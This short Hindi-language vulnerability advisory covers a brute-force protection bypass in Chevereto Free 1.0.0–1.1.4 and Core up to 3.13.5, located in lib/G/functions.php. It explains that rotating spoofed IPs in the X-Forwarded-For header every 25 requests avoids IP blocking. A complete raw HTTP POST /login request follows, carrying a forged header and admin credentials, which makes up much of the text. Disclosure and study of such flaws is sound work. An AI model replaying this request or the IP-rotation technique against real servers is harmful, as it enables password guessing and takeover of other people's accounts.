
Chevereto 1.0.0 से 1.1.4 Free, और 3.13.5 Core तक के lib/G/functions.php में, एक हमलावर अनुरोध में X-Forwarded-For हेडर में हेरफेर करके लागू सुरक्षा तंत्र को ट्रिगर किए बिना ब्रूटफोर्स हमले कर सकता है।
Chevereto 1.0.0 से 1.1.4 Free, और 3.13.5 Core तक, lib/G/functions.php में, अनुरोध में X-Forwarded-For हेडर में हेरफेर करके एक हमलावर लागू सुरक्षा तंत्र को ट्रिगर किए बिना ब्रूटफोर्स हमले कर सकता है। प्रोटेक्शन को सक्रिय होने और IP को ब्लॉक होने से बचाने के लिए हेडर में IP को हर 25वें अनुरोध (डिफ़ॉल्ट 25) पर बदलना होता है (हालाँकि इससे कोई फर्क नहीं पड़ता)।
X-Forwarded-For: 8.8.8.1, 8.8.8.2
X-Forwarded-For: 8.8.8.2, 8.8.8.3
और इसी तरह आगे...
POST /login HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://192.168.0.88
DNT: 1
Connection: close
Referer: http://192.168.0.88/login
X-Forwarded-For: 8.8.8.228, 8.8.8.88
Cookie: PHPSESSID=16dal7t7fmdbd86ahjkp8qo43a
Upgrade-Insecure-Requests: 1
login-subject=admin&password=test&auth_token=fb22558fc0f068d3cfb9ca98b413c8d0adbbc205